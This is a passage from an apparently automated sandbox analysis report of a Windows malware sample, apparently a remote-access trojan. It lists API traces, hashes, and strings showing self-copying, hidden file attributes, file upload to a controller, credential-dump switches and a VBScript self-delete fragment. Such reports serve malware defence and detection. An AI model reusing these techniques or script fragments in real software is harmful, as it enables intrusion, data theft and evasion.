                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                          • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                          • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                          • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Write$Create
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 1602526932-4212202414
                                          • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                          • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                          • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                          • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000001,00407688,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                          • API String ID: 1646373207-2634879609
                                          • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                          • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                          • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                          • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040CE42
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                          • _wcslen.LIBCMT ref: 0040CF21
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000000,00000000), ref: 0040CFBF
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                          • _wcslen.LIBCMT ref: 0040D001
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                          • String ID: 6$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$del$open$xdF$RG$RG
                                          • API String ID: 1579085052-3150217690
                                          • Opcode ID: 0fa9b5b1dd786efaf3be6b7155859af5081faa42a1eb35d72d6144a2fd8a8eb1
                                          • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                          • Opcode Fuzzy Hash: 0fa9b5b1dd786efaf3be6b7155859af5081faa42a1eb35d72d6144a2fd8a8eb1
                                          • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                          • _wcslen.LIBCMT ref: 0041C1CC
                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                          • GetLastError.KERNEL32 ref: 0041C204
                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                          • GetLastError.KERNEL32 ref: 0041C261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                          • String ID: ?
                                          • API String ID: 3941738427-1684325040
                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable$_wcschr
                                          • String ID:
                                          • API String ID: 3899193279-0
                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                          • String ID: /stext "$,aF$@TG$@TG
                                          • API String ID: 1223786279-971885606
                                          • Opcode ID: fec93c9289c1766bf46719126c79de9011d1f9e0700ce836de87cdf7ea2c4a35
                                          • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                          • Opcode Fuzzy Hash: fec93c9289c1766bf46719126c79de9011d1f9e0700ce836de87cdf7ea2c4a35
                                          • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                          • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                          • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                          • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                          • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                          • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                          • __aulldiv.LIBCMT ref: 00408D88
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF
                                          • API String ID: 3086580692-731956494
                                          • Opcode ID: 966f2b8a52828e5852c36c7200f095a726508005ada64ea9ce90e921c0413125
                                          • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                          • Opcode Fuzzy Hash: 966f2b8a52828e5852c36c7200f095a726508005ada64ea9ce90e921c0413125
                                          • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open$xdF
                                          • API String ID: 1913171305-3121233398
                                          • Opcode ID: a6785ec93dcaa828c2725d5a80a16d8a1d64272e6ee7c762ad3af656f080ac9c
                                          • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                          • Opcode Fuzzy Hash: a6785ec93dcaa828c2725d5a80a16d8a1d64272e6ee7c762ad3af656f080ac9c
                                          • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                          • String ID: \ws2_32$\wship6$getaddrinfo
                                          • API String ID: 2490988753-3078833738
                                          • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                          • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                          • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                          • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                          • _free.LIBCMT ref: 0045137F
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004513A1
                                          • _free.LIBCMT ref: 004513B6
                                          • _free.LIBCMT ref: 004513C1
                                          • _free.LIBCMT ref: 004513E3
                                          • _free.LIBCMT ref: 004513F6
                                          • _free.LIBCMT ref: 00451404
                                          • _free.LIBCMT ref: 0045140F
                                          • _free.LIBCMT ref: 00451447
                                          • _free.LIBCMT ref: 0045144E
                                          • _free.LIBCMT ref: 0045146B
                                          • _free.LIBCMT ref: 00451483
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
